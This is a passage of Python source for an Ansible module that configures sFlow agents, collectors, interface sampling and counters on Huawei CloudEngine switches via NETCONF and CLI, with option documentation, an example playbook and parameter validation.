choices: ['enable', 'disable']
rate_limit:
description:
- Specifies the rate of sFlow packets sent from a card to the control plane.
The value is an integer that ranges from 100 to 1500, in pps.
rate_limit_slot:
description:
- Specifies the slot where the rate of output sFlow packets is limited.
If this parameter is not specified, the rate of sFlow packets sent from
all cards to the control plane is limited.
The value is an integer or a string of characters.
forward_enp_slot:
description:
- Enable the Embedded Network Processor (ENP) chip function.
The switch uses the ENP chip to perform sFlow sampling,
and the maximum sFlow sampling interval is 65535.
If you set the sampling interval to be larger than 65535,
the switch automatically restores it to 65535.
The value is an integer or 'all'.
state:
description:
- Determines whether the config should be present or not
on the device.
default: present
choices: ['present', 'absent']
"""
EXAMPLES = '''
---
- name: sflow module test
hosts: ce128
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: Configuring sFlow Agent
ce_sflow:
agent_ip: 6.6.6.6
provider: '{{ cli }}'
- name: Configuring sFlow Collector
ce_sflow:
collector_id: 1
collector_ip: 7.7.7.7
collector_ip_vpn: vpn1
collector_description: Collector1
provider: '{{ cli }}'
- name: Configure flow sampling.
ce_sflow:
sflow_interface: 10GE2/0/2
sample_collector: 1
sample_direction: inbound
provider: '{{ cli }}'
- name: Configure counter sampling.
ce_sflow:
sflow_interface: 10GE2/0/2
counter_collector: 1
counter_interval: 1000
provider: '{{ cli }}'
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: verbose mode
type: dict
sample: {"agent_ip": "6.6.6.6", "state": "present"}
existing:
description: k/v pairs of existing configuration
returned: verbose mode
type: dict
sample: {"agent": {}}
end_state:
description: k/v pairs of configuration after module execution
returned: verbose mode
type: dict
sample: {"agent": {"family": "ipv4", "ipv4Addr": "1.2.3.4", "ipv6Addr": null}}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["sflow agent ip 6.6.6.6"]
changed:
description: check to see if a change was made on the device
returned: always
type: bool
sample: true
'''
import re
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.cloudengine.ce import get_nc_config, set_nc_config, ce_argument_spec, check_ip_addr
from ansible.module_utils.network.cloudengine.ce import get_config, load_config
CE_NC_GET_SFLOW = """
<filter type="subtree">
<sflow xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<sources>
<source>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
</source>
</sources>
<agents>
<agent>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
</agent>
</agents>
<collectors>
<collector>
<collectorID></collectorID>
<family></family>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
<vrfName></vrfName>
<datagramSize></datagramSize>
<port></port>
<description></description>
<meth></meth>
</collector>
</collectors>
<samplings>
<sampling>
<ifName>%s</ifName>
<collectorID></collectorID>
<direction></direction>
<length></length>
<rate></rate>
</sampling>
</samplings>
<counters>
<counter>
<ifName>%s</ifName>
<collectorID></collectorID>
<interval></interval>
</counter>
</counters>
<exports>
<export>
<ExportRoute></ExportRoute>
</export>
</exports>
</sflow>
</filter>
"""
def is_config_exist(cmp_cfg, test_cfg):
"""is configuration exist?"""
if not cmp_cfg or not test_cfg:
return False
return bool(test_cfg in cmp_cfg)
def is_valid_ip_vpn(vpname):
"""check ip vpn"""
if not vpname:
return False
if vpname == "_public_":
return False
if len(vpname) < 1 or len(vpname) > 31:
return False
return True
def get_ip_version(address):
"""get ip version fast"""
if not address:
return None
if address.count(':') >= 2 and address.count(":") <= 7:
return "ipv6"
elif address.count('.') == 3:
return "ipv4"
else:
return None
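# Illustrative examples (not part of the original module) of the heuristic above:
#   get_ip_version("192.168.1.1")  -> "ipv4"   (three dots)
#   get_ip_version("fe80::1")      -> "ipv6"   (two or more colons)
#   get_ip_version("not-an-ip")    -> None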
def get_interface_type(interface):
"""get the type of interface, such as 10GE, ETH-TRUNK, VLANIF..."""
if interface is None:
return None
if interface.upper().startswith('GE'):
iftype = 'ge'
elif interface.upper().startswith('10GE'):
iftype = '10ge'
elif interface.upper().startswith('25GE'):
iftype = '25ge'
elif interface.upper().startswith('4X10GE'):
iftype = '4x10ge'
elif interface.upper().startswith('40GE'):
iftype = '40ge'
elif interface.upper().startswith('100GE'):
iftype = '100ge'
elif interface.upper().startswith('VLANIF'):
iftype = 'vlanif'
elif interface.upper().startswith('LOOPBACK'):
iftype = 'loopback'
elif interface.upper().startswith('METH'):
iftype = 'meth'
elif interface.upper().startswith('ETH-TRUNK'):
iftype = 'eth-trunk'
elif interface.upper().startswith('VBDIF'):
iftype = 'vbdif'
elif interface.upper().startswith('NVE'):
iftype = 'nve'
elif interface.upper().startswith('TUNNEL'):
iftype = 'tunnel'
elif interface.upper().startswith('ETHERNET'):
iftype = 'ethernet'
elif interface.upper().startswith('FCOE-PORT'):
iftype = 'fcoe-port'
elif interface.upper().startswith('FABRIC-PORT'):
iftype = 'fabric-port'
elif interface.upper().startswith('STACK-PORT'):
iftype = 'stack-port'
elif interface.upper().startswith('NULL'):
iftype = 'null'
else:
return None
return iftype.lower()
def get_rate_limit(config):
"""get sflow management-plane export rate-limit info"""
get = re.findall(r"sflow management-plane export rate-limit ([0-9]+) slot ([0-9]+)", config)
if not get:
get = re.findall(r"sflow management-plane export rate-limit ([0-9]+)", config)
if not get:
return None
else:
return dict(rate_limit=get[0])
else:
limit = list()
for slot in get:
limit.append(dict(rate_limit=slot[0], slot_id=slot[1]))
return limit
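# Illustrative example (not part of the original module): given display
# configuration containing the line
#     sflow management-plane export rate-limit 200 slot 2
# get_rate_limit() returns [{'rate_limit': '200', 'slot_id': '2'}]; if the
# line has no "slot" suffix, the second regex matches instead and the
# function returns {'rate_limit': '200'}.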
def get_forward_enp(config):
"""get assign forward enp sflow enable slot info"""
get = re.findall(r"assign forward enp sflow enable slot (\S+)", config)
if not get:
return None
else:
return list(get)
class Sflow(object):
"""Manages sFlow"""
def __init__(self, argument_spec):
self.spec = argument_spec
self.module = None
self.__init_module__()
# module input info
self.agent_ip = self.module.params['agent_ip']
self.agent_version = None
self.source_ip = self.module.params['source_ip']
self.source_version = None
self.export_route = self.module.params['export_route']
self.rate_limit = self.module.params['rate_limit']
self.rate_limit_slot = self.module.params['rate_limit_slot']
self.forward_enp_slot = self.module.params['forward_enp_slot']
self.collector_id = self.module.params['collector_id']
self.collector_ip = self.module.params['collector_ip']
self.collector_version = None
self.collector_ip_vpn = self.module.params['collector_ip_vpn']
self.collector_datagram_size = self.module.params['collector_datagram_size']
self.collector_udp_port = self.module.params['collector_udp_port']
self.collector_meth = self.module.params['collector_meth']
self.collector_description = self.module.params['collector_description']
self.sflow_interface = self.module.params['sflow_interface']
self.sample_collector = self.module.params['sample_collector'] or list()
self.sample_rate = self.module.params['sample_rate']
self.sample_length = self.module.params['sample_length']
self.sample_direction = self.module.params['sample_direction']
self.counter_collector = self.module.params['counter_collector'] or list()
self.counter_interval = self.module.params['counter_interval']
self.state = self.module.params['state']
# state
self.config = "" # current config
self.sflow_dict = dict()
self.changed = False
self.updates_cmd = list()
self.commands = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def __init_module__(self):
"""init module"""
required_together = [("collector_id", "collector_ip")]
self.module = AnsibleModule(
argument_spec=self.spec, required_together=required_together, supports_check_mode=True)
def check_response(self, con_obj, xml_name):
"""Check if response message is already succeed"""
xml_str = con_obj.xml
if "<ok/>" not in xml_str:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def netconf_set_config(self, xml_str, xml_name):
"""netconf set config"""
rcv_xml = set_nc_config(self.module, xml_str)
if "<ok/>" not in rcv_xml:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def cli_load_config(self, commands):
"""load config by cli"""
if not self.module.check_mode:
load_config(self.module, commands)
def get_current_config(self):
"""get current configuration"""
flags = list()
exp = ""
if self.rate_limit:
exp += "assign sflow management-plane export rate-limit %s" % self.rate_limit
if self.rate_limit_slot:
exp += " slot %s" % self.rate_limit_slot
exp += "$"
if self.forward_enp_slot:
if exp:
exp += "|"
exp += "assign forward enp sflow enable slot %s$" % self.forward_enp_slot
if exp:
exp = " | ignore-case include " + exp
flags.append(exp)
return get_config(self.module, flags)
else:
return ""
def cli_add_command(self, command, undo=False):
"""add command to self.update_cmd and self.commands"""
if undo and command.lower() not in ["quit", "return"]:
cmd = "undo " + command
else:
cmd = command
self.commands.append(cmd) # set to device
if command.lower() not in ["quit", "return"]:
self.updates_cmd.append(cmd) # show updates result
def get_sflow_dict(self):
""" sflow config dict"""
sflow_dict = dict(source=list(), agent=dict(), collector=list(),
sampling=dict(), counter=dict(), export=dict())
conf_str = CE_NC_GET_SFLOW % (
self.sflow_interface, self.sflow_interface)
if not self.collector_meth:
conf_str = conf_str.replace("<meth></meth>", "")
rcv_xml = get_nc_config(self.module, conf_str)
if "<data/>" in rcv_xml:
return sflow_dict
xml_str = rcv_xml.replace('\r', '').replace('\n', '').\
replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
root = ElementTree.fromstring(xml_str)
# get source info
srcs = root.findall("data/sflow/sources/source")
if srcs:
for src in srcs:
attrs = dict()
for attr in src:
if attr.tag in ["family", "ipv4Addr", "ipv6Addr"]:
attrs[attr.tag] = attr.text
sflow_dict["source"].append(attrs)
# get agent info
agent = root.find("data/sflow/agents/agent")
if agent is not None:
for attr in agent:
if attr.tag in ["family", "ipv4Addr", "ipv6Addr"]:
sflow_dict["agent"][attr.tag] = attr.text
# get collector info
collectors = root.findall("data/sflow/collectors/collector")
if collectors:
for collector in collectors:
attrs = dict()
for attr in collector:
if attr.tag in ["collectorID", "family", "ipv4Addr", "ipv6Addr",
"vrfName", "datagramSize", "port", "description", "meth"]:
attrs[attr.tag] = attr.text
sflow_dict["collector"].append(attrs)
# get sampling info
sample = root.find("data/sflow/samplings/sampling")
if sample is not None:
for attr in sample:
if attr.tag in ["ifName", "collectorID", "direction", "length", "rate"]:
sflow_dict["sampling"][attr.tag] = attr.text
# get counter info
counter = root.find("data/sflow/counters/counter")
if counter is not None:
for attr in counter:
if attr.tag in ["ifName", "collectorID", "interval"]:
sflow_dict["counter"][attr.tag] = attr.text
# get export info
export = root.find("data/sflow/exports/export")
if export is not None:
for attr in export:
if attr.tag == "ExportRoute":
sflow_dict["export"][attr.tag] = attr.text
return sflow_dict
def config_agent(self):
"""configures sFlow agent"""
xml_str = ''
if not self.agent_ip:
return xml_str
self.agent_version = get_ip_version(self.agent_ip)
if not self.agent_version:
self.module.fail_json(msg="Error: agent_ip is invalid.")
if self.state == "present":
if self.agent_ip != self.sflow_dict["agent"].get("ipv4Addr") \
and self.agent_ip != self.sflow_dict["agent"].get("ipv6Addr"):
xml_str += '<agents><agent operation="merge">'
xml_str += '<family>%s</family>' % self.agent_version
if self.agent_version == "ipv4":
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.agent_ip
self.updates_cmd.append("sflow agent ip %s" % self.agent_ip)
else:
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.agent_ip
self.updates_cmd.append("sflow agent ipv6 %s" % self.agent_ip)
xml_str += '</agent></agents>'
else:
if self.agent_ip == self.sflow_dict["agent"].get("ipv4Addr") \
or self.agent_ip == self.sflow_dict["agent"].get("ipv6Addr"):
xml_str += '<agents><agent operation="delete"></agent></agents>'
self.updates_cmd.append("undo sflow agent")
return xml_str
def config_source(self):
"""configures the source IP address for sFlow packets"""
xml_str = ''
if not self.source_ip:
return xml_str
self.source_version = get_ip_version(self.source_ip)
if not self.source_version:
self.module.fail_json(msg="Error: source_ip is invalid.")
src_dict = dict()
for src in self.sflow_dict["source"]:
if src.get("family") == self.source_version:
src_dict = src
break
if self.state == "present":
if self.source_ip != src_dict.get("ipv4Addr") \
and self.source_ip != src_dict.get("ipv6Addr"):
xml_str += '<sources><source operation="merge">'
xml_str += '<family>%s</family>' % self.source_version
if self.source_version == "ipv4":
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.source_ip
self.updates_cmd.append("sflow source ip %s" % self.source_ip)
else:
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.source_ip
self.updates_cmd.append(
"sflow source ipv6 %s" % self.source_ip)
xml_str += '</source></sources>'
else:
if self.source_ip == src_dict.get("ipv4Addr"):
xml_str += '<sources><source operation="delete"><family>ipv4</family></source ></sources>'
self.updates_cmd.append("undo sflow source ip %s" % self.source_ip)
elif self.source_ip == src_dict.get("ipv6Addr"):
xml_str += '<sources><source operation="delete"><family>ipv6</family></source ></sources>'
self.updates_cmd.append("undo sflow source ipv6 %s" % self.source_ip)
return xml_str
def config_collector(self):
"""creates an sFlow collector and sets or modifies optional parameters for the sFlow collector"""
xml_str = ''
if not self.collector_id:
return xml_str
if self.state == "present" and not self.collector_ip:
return xml_str
if self.collector_ip:
self.collector_version = get_ip_version(self.collector_ip)
if not self.collector_version:
self.module.fail_json(msg="Error: collector_ip is invalid.")
# get collector dict
exist_dict = dict()
for collector in self.sflow_dict["collector"]:
if collector.get("collectorID") == self.collector_id:
exist_dict = collector
break
change = False
if self.state == "present":
if not exist_dict:
change = True
elif self.collector_version != exist_dict.get("family"):
change = True
elif self.collector_version == "ipv4" and self.collector_ip != exist_dict.get("ipv4Addr"):
change = True
elif self.collector_version == "ipv6" and self.collector_ip != exist_dict.get("ipv6Addr"):
change = True
elif self.collector_ip_vpn and self.collector_ip_vpn != exist_dict.get("vrfName"):
change = True
elif not self.collector_ip_vpn and exist_dict.get("vrfName") != "_public_":
change = True
elif self.collector_udp_port and self.collector_udp_port != exist_dict.get("port"):
change = True
elif not self.collector_udp_port and exist_dict.get("port") != "6343":
change = True
elif self.collector_datagram_size and self.collector_datagram_size != exist_dict.get("datagramSize"):
change = True
elif not self.collector_datagram_size and exist_dict.get("datagramSize") != "1400":
change = True
elif self.collector_meth and self.collector_meth != exist_dict.get("meth"):
change = True
elif not self.collector_meth and exist_dict.get("meth") and exist_dict.get("meth") != "meth":
change = True
elif self.collector_description and self.collector_description != exist_dict.get("description"):
change = True
elif not self.collector_description and exist_dict.get("description"):
change = True
else:
pass
else: # absent
# collector not exist
if not exist_dict:
return xml_str
if self.collector_version and self.collector_version != exist_dict.get("family"):
return xml_str
if self.collector_version == "ipv4" and self.collector_ip != exist_dict.get("ipv4Addr"):
return xml_str
if self.collector_version == "ipv6" and self.collector_ip != exist_dict.get("ipv6Addr"):
return xml_str
if self.collector_ip_vpn and self.collector_ip_vpn != exist_dict.get("vrfName"):
return xml_str
if self.collector_udp_port and self.collector_udp_port != exist_dict.get("port"):
return xml_str
if self.collector_datagram_size and self.collector_datagram_size != exist_dict.get("datagramSize"):
return xml_str
if self.collector_meth and self.collector_meth != exist_dict.get("meth"):
return xml_str
if self.collector_description and self.collector_description != exist_dict.get("description"):
return xml_str
change = True
if not change:
return xml_str
# update or delete
if self.state == "absent":
xml_str += '<collectors><collector operation="delete"><collectorID>%s</collectorID>' % self.collector_id
self.updates_cmd.append("undo collector %s" % self.collector_id)
else:
xml_str += '<collectors><collector operation="merge"><collectorID>%s</collectorID>' % self.collector_id
cmd = "sflow collector %s" % self.collector_id
xml_str += '<family>%s</family>' % self.collector_version
if self.collector_version == "ipv4":
cmd += " ip %s" % self.collector_ip
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.collector_ip
else:
cmd += " ipv6 %s" % self.collector_ip
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.collector_ip
if self.collector_ip_vpn:
cmd += " vpn-instance %s" % self.collector_ip_vpn
xml_str += '<vrfName>%s</vrfName>' % self.collector_ip_vpn
if self.collector_datagram_size:
cmd += " length %s" % self.collector_datagram_size
xml_str += '<datagramSize>%s</datagramSize>' % self.collector_datagram_size
if self.collector_udp_port:
cmd += " udp-port %s" % self.collector_udp_port
xml_str += '<port>%s</port>' % self.collector_udp_port
if self.collector_description:
cmd += " description %s" % self.collector_description
xml_str += '<description>%s</description>' % self.collector_description
else:
xml_str += '<description></description>'
if self.collector_meth:
if self.collector_meth == "enhanced":
cmd += " enhanced"
xml_str += '<meth>%s</meth>' % self.collector_meth
self.updates_cmd.append(cmd)
xml_str += "</collector></collectors>"
return xml_str
def config_sampling(self):
"""configure sflow sampling on an interface"""
xml_str = ''
if not self.sflow_interface:
return xml_str
if not self.sflow_dict["sampling"] and self.state == "absent":
return xml_str
self.updates_cmd.append("interface %s" % self.sflow_interface)
if self.state == "present":
xml_str += '<samplings><sampling operation="merge"><ifName>%s</ifName>' % self.sflow_interface
else:
xml_str += '<samplings><sampling operation="delete"><ifName>%s</ifName>' % self.sflow_interface
# sample_collector
if self.sample_collector:
if self.sflow_dict["sampling"].get("collectorID") \
and self.sflow_dict["sampling"].get("collectorID") != "invalid":
existing = self.sflow_dict["sampling"].get("collectorID").split(',')
else:
existing = list()
if self.state == "present":
diff = list(set(self.sample_collector) - set(existing))
if diff:
self.updates_cmd.append(
"sflow sampling collector %s" % ' '.join(diff))
new_set = list(self.sample_collector + existing)
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(new_set)))
else:
same = list(set(self.sample_collector) & set(existing))
if same:
self.updates_cmd.append(
"undo sflow sampling collector %s" % ' '.join(same))
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(same)))
# sample_rate
if self.sample_rate:
exist = bool(self.sample_rate == self.sflow_dict["sampling"].get("rate"))
if self.state == "present" and not exist:
self.updates_cmd.append(
"sflow sampling rate %s" % self.sample_rate)
xml_str += '<rate>%s</rate>' % self.sample_rate
elif self.state == "absent" and exist:
self.updates_cmd.append(
"undo sflow sampling rate %s" % self.sample_rate)
xml_str += '<rate>%s</rate>' % self.sample_rate
# sample_length
if self.sample_length:
exist = bool(self.sample_length == self.sflow_dict["sampling"].get("length"))
if self.state == "present" and not exist:
self.updates_cmd.append(
"sflow sampling length %s" % self.sample_length)
xml_str += '<length>%s</length>' % self.sample_length
elif self.state == "absent" and exist:
self.updates_cmd.append(
"undo sflow sampling length %s" % self.sample_length)
xml_str += '<length>%s</length>' % self.sample_length
# sample_direction
if self.sample_direction:
direction = list()
if self.sample_direction == "both":
direction = ["inbound", "outbound"]
else:
direction.append(self.sample_direction)
existing = list()
if self.sflow_dict["sampling"].get("direction"):
if self.sflow_dict["sampling"].get("direction") == "both":
existing = ["inbound", "outbound"]
else:
existing.append(
self.sflow_dict["sampling"].get("direction"))
if self.state == "present":
diff = list(set(direction) - set(existing))
if diff:
new_set = list(set(direction + existing))
self.updates_cmd.append(
"sflow sampling %s" % ' '.join(diff))
if len(new_set) > 1:
new_dir = "both"
else:
new_dir = new_set[0]
xml_str += '<direction>%s</direction>' % new_dir
else:
same = list(set(existing) & set(direction))
if same:
self.updates_cmd.append("undo sflow sampling %s" % ' '.join(same))
if len(same) > 1:
del_dir = "both"
else:
del_dir = same[0]
xml_str += '<direction>%s</direction>' % del_dir
if xml_str.endswith("</ifName>"):
self.updates_cmd.pop()
return ""
xml_str += '</sampling></samplings>'
return xml_str
def config_counter(self):
"""configures sflow counter on an interface"""
xml_str = ''
if not self.sflow_interface:
return xml_str
if not self.sflow_dict["counter"] and self.state == "absent":
return xml_str
self.updates_cmd.append("interface %s" % self.sflow_interface)
if self.state == "present":
xml_str += '<counters><counter operation="merge"><ifName>%s</ifName>' % self.sflow_interface
else:
xml_str += '<counters><counter operation="delete"><ifName>%s</ifName>' % self.sflow_interface
# counter_collector
if self.counter_collector:
if self.sflow_dict["counter"].get("collectorID") \
and self.sflow_dict["counter"].get("collectorID") != "invalid":
existing = self.sflow_dict["counter"].get("collectorID").split(',')
else:
existing = list()
if self.state == "present":
diff = list(set(self.counter_collector) - set(existing))
if diff:
self.updates_cmd.append("sflow counter collector %s" % ' '.join(diff))
new_set = list(self.counter_collector + existing)
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(new_set)))
else:
same = list(set(self.counter_collector) & set(existing))
if same:
self.updates_cmd.append(
"undo sflow counter collector %s" % ' '.join(same))
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(same)))
# counter_interval
if self.counter_interval:
exist = bool(self.counter_interval == self.sflow_dict["counter"].get("interval"))
if self.state == "present" and not exist:
self.updates_cmd.append(
"sflow counter interval %s" % self.counter_interval)
xml_str += '<interval>%s</interval>' % self.counter_interval
elif self.state == "absent" and exist:
self.updates_cmd.append(
"undo sflow counter interval %s" % self.counter_interval)
xml_str += '<interval>%s</interval>' % self.counter_interval
if xml_str.endswith("</ifName>"):
self.updates_cmd.pop()
return ""
xml_str += '</counter></counters>'
return xml_str
def config_export(self):
"""configure sflow export"""
xml_str = ''
if not self.export_route:
return xml_str
if self.export_route == "enable":
if self.sflow_dict["export"] and self.sflow_dict["export"].get("ExportRoute") == "disable":
xml_str = '<exports><export operation="delete"><ExportRoute>disable</ExportRoute></export></exports>'
self.updates_cmd.append("undo sflow export extended-route-data disable")
else: # disable
if not self.sflow_dict["export"] or self.sflow_dict["export"].get("ExportRoute") != "disable":
xml_str = '<exports><export operation="create"><ExportRoute>disable</ExportRoute></export></exports>'
self.updates_cmd.append("sflow export extended-route-data disable")
return xml_str
def config_assign(self):
"""configure assign"""
# assign sflow management-plane export rate-limit rate-limit [ slot slot-id ]
if self.rate_limit:
cmd = "assign sflow management-plane export rate-limit %s" % self.rate_limit
if self.rate_limit_slot:
cmd += " slot %s" % self.rate_limit_slot
exist = is_config_exist(self.config, cmd)
if self.state == "present" and not exist:
self.cli_add_command(cmd)
elif self.state == "absent" and exist:
self.cli_add_command(cmd, undo=True)
# assign forward enp sflow enable slot { slot-id | all }
if self.forward_enp_slot:
cmd = "assign forward enp sflow enable slot %s" % self.forward_enp_slot
exist = is_config_exist(self.config, cmd)
if self.state == "present" and not exist:
self.cli_add_command(cmd)
elif self.state == "absent" and exist:
self.cli_add_command(cmd, undo=True)
def netconf_load_config(self, xml_str):
"""load sflow config by netconf"""
if not xml_str:
return
xml_cfg = """
<config>
<sflow xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
%s
</sflow>
</config>""" % xml_str
self.netconf_set_config(xml_cfg, "SET_SFLOW")
self.changed = True
def check_params(self):
"""Check all input params"""
# check agent_ip
if self.agent_ip:
self.agent_ip = self.agent_ip.upper()
if not check_ip_addr(self.agent_ip):
self.module.fail_json(msg="Error: agent_ip is invalid.")
# check source_ip
if self.source_ip:
self.source_ip = self.source_ip.upper()
if not check_ip_addr(self.source_ip):
self.module.fail_json(msg="Error: source_ip is invalid.")
# check collector
if self.collector_id:
# check collector_ip and collector_ip_vpn
if self.collector_ip:
self.collector_ip = self.collector_ip.upper()
if not check_ip_addr(self.collector_ip):
self.module.fail_json(
msg="Error: collector_ip is invalid.")
if self.collector_ip_vpn and not is_valid_ip_vpn(self.collector_ip_vpn):
self.module.fail_json(
msg="Error: collector_ip_vpn is invalid.")
# check collector_datagram_size ranges from 1024 to 8100
if self.collector_datagram_size:
if not self.collector_datagram_size.isdigit():
self.module.fail_json(
msg="Error: collector_datagram_size is not digit.")
if int(self.collector_datagram_size) < 1024 or int(self.collector_datagram_size) > 8100:
self.module.fail_json(
msg="Error: collector_datagram_size is not ranges from 1024 to 8100.")
# check collector_udp_port ranges from 1 to 65535
if self.collector_udp_port:
if not self.collector_udp_port.isdigit():
self.module.fail_json(
msg="Error: collector_udp_port is not digit.")
if int(self.collector_udp_port) < 1 or int(self.collector_udp_port) > 65535:
self.module.fail_json(
msg="Error: collector_udp_port is not ranges from 1 to 65535.")
# check collector_description 1 to 255 case-sensitive characters
if self.collector_description:
if self.collector_description.count(" "):
self.module.fail_json(
msg="Error: collector_description should without spaces.")
if len(self.collector_description) < 1 or len(self.collector_description) > 255:
self.module.fail_json(
msg="Error: collector_description is not ranges from 1 to 255.")
# check sflow_interface
if self.sflow_interface:
intf_type = get_interface_type(self.sflow_interface)
if not intf_type:
self.module.fail_json(msg="Error: intf_type is invalid.")
if intf_type not in ['ge', '10ge', '25ge', '4x10ge', '40ge', '100ge', 'eth-trunk']:
self.module.fail_json(
msg="Error: interface %s is not support sFlow." % self.sflow_interface)
# check sample_collector
if self.sample_collector:
self.sample_collector.sort()
if self.sample_collector not in [["1"], ["2"], ["1", "2"]]:
self.module.fail_json(
msg="Error: sample_collector is invalid.")
# check sample_rate ranges from 1 to 4294967295
if self.sample_rate:
if not self.sample_rate.isdigit():
self.module.fail_json(
msg="Error: sample_rate is not digit.")
if int(self.sample_rate) < 1 or int(self.sample_rate) > 4294967295:
self.module.fail_json(
msg="Error: sample_rate is not ranges from 1 to 4294967295.")
# check sample_length ranges from 18 to 512
if self.sample_length:
if not self.sample_length.isdigit():
self.module.fail_json(
msg="Error: sample_rate is not digit.")
if int(self.sample_length) < 18 or int(self.sample_length) > 512:
self.module.fail_json(
msg="Error: sample_length is not ranges from 18 to 512.")
# check counter_collector
if self.counter_collector:
self.counter_collector.sort()
if self.counter_collector not in [["1"], ["2"], ["1", "2"]]:
self.module.fail_json(
msg="Error: counter_collector is invalid.")
# counter_interval ranges from 10 to 4294967295
if self.counter_interval:
if not self.counter_interval.isdigit():
self.module.fail_json(
msg="Error: counter_interval is not digit.")
if int(self.counter_interval) < 10 or int(self.counter_interval) > 4294967295:
self.module.fail_json(
msg="Error: sample_length is not ranges from 10 to 4294967295.")
# check rate_limit ranges from 100 to 1500 and check rate_limit_slot
if self.rate_limit:
if not self.rate_limit.isdigit():
self.module.fail_json(msg="Error: rate_limit is not digit.")
if int(self.rate_limit) < 100 or int(self.rate_limit) > 1500:
self.module.fail_json(
msg="Error: rate_limit is not ranges from 100 to 1500.")
if self.rate_limit_slot and not self.rate_limit_slot.isdigit():
self.module.fail_json(
msg="Error: rate_limit_slot is not digit.")
# check forward_enp_slot
if self.forward_enp_slot:
self.forward_enp_slot = self.forward_enp_slot.lower()
if not self.forward_enp_slot.isdigit() and self.forward_enp_slot != "all":
self.module.fail_json(
msg="Error: forward_enp_slot is invalid.")
def get_proposed(self):
"""get proposed info"""
# base config
if self.agent_ip:
self.proposed["agent_ip"] = self.agent_ip
if self.source_ip:
self.proposed["source_ip"] = self.source_ip
if self.export_route:
self.proposed["export_route"] = self.export_route
if self.rate_limit:
self.proposed["rate_limit"] = self.rate_limit
self.proposed["rate_limit_slot"] = self.rate_limit_slot
if self.forward_enp_slot:
self.proposed["forward_enp_slot"] = self.forward_enp_slot
if self.collector_id:
self.proposed["collector_id"] = self.collector_id
if self.collector_ip:
self.proposed["collector_ip"] = self.collector_ip
self.proposed["collector_ip_vpn"] = self.collector_ip_vpn
if self.collector_datagram_size:
self.proposed[
"collector_datagram_size"] = self.collector_datagram_size
if self.collector_udp_port:
self.proposed["collector_udp_port"] = self.collector_udp_port
if self.collector_meth:
self.proposed["collector_meth"] = self.collector_meth
if self.collector_description:
self.proposed[
"collector_description"] = self.collector_description
# sample and counter config
if self.sflow_interface:
self.proposed["sflow_interface"] = self.sflow_interface
if self.sample_collector:
self.proposed["sample_collector"] = self.sample_collector
if self.sample_rate:
self.proposed["sample_rate"] = self.sample_rate
if self.sample_length:
self.proposed["sample_length"] = self.sample_length
if self.sample_direction:
self.proposed["sample_direction"] = self.sample_direction
if self.counter_collector:
self.proposed["counter_collector"] = self.counter_collector
if self.counter_interval:
self.proposed["counter_interval"] = self.counter_interval
self.proposed["state"] = self.state
def get_existing(self):
"""get existing info"""
if self.config:
if self.rate_limit:
self.existing["rate_limit"] = get_rate_limit(self.config)
if self.forward_enp_slot:
self.existing["forward_enp_slot"] = get_forward_enp(
self.config)
if not self.sflow_dict:
return
if self.agent_ip:
self.existing["agent"] = self.sflow_dict["agent"]
if self.source_ip:
self.existing["source"] = self.sflow_dict["source"]
if self.collector_id:
self.existing["collector"] = self.sflow_dict["collector"]
if self.export_route:
self.existing["export"] = self.sflow_dict["export"]
if self.sflow_interface:
self.existing["sampling"] = self.sflow_dict["sampling"]
self.existing["counter"] = self.sflow_dict["counter"]
def get_end_state(self):
"""get end state info"""
config = self.get_current_config()
if config:
if self.rate_limit:
self.end_state["rate_limit"] = get_rate_limit(config)
if self.forward_enp_slot:
self.end_state["forward_enp_slot"] = get_forward_enp(config)
sflow_dict = self.get_sflow_dict()
if not sflow_dict:
return
if self.agent_ip:
self.end_state["agent"] = sflow_dict["agent"]
if self.source_ip:
self.end_state["source"] = sflow_dict["source"]
if self.collector_id:
self.end_state["collector"] = sflow_dict["collector"]
if self.export_route:
self.end_state["export"] = sflow_dict["export"]
if self.sflow_interface:
self.end_state["sampling"] = sflow_dict["sampling"]
self.end_state["counter"] = sflow_dict["counter"]
def work(self):
"""worker"""
self.check_params()
self.sflow_dict = self.get_sflow_dict()
self.config = self.get_current_config()
self.get_existing()
self.get_proposed()
# deal present or absent
xml_str = ''
if self.export_route:
xml_str += self.config_export()
if self.agent_ip:
xml_str += self.config_agent()
if self.source_ip:
xml_str += self.config_source()
if self.state == "present":
if self.collector_id and self.collector_ip:
xml_str += self.config_collector()
if self.sflow_interface:
xml_str += self.config_sampling()
xml_str += self.config_counter()
else:
if self.sflow_interface:
xml_str += self.config_sampling()
xml_str += self.config_counter()
if self.collector_id:
xml_str += self.config_collector()
if self.rate_limit or self.forward_enp_slot:
self.config_assign()
if self.commands:
self.cli_load_config(self.commands)
self.changed = True
if xml_str:
self.netconf_load_config(xml_str)
self.changed = True
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
if self.changed:
self.results['updates'] = self.updates_cmd
else:
self.results['updates'] = list()
self.module.exit_json(**self.results)
def main():
"""Module main"""
argument_spec = dict(
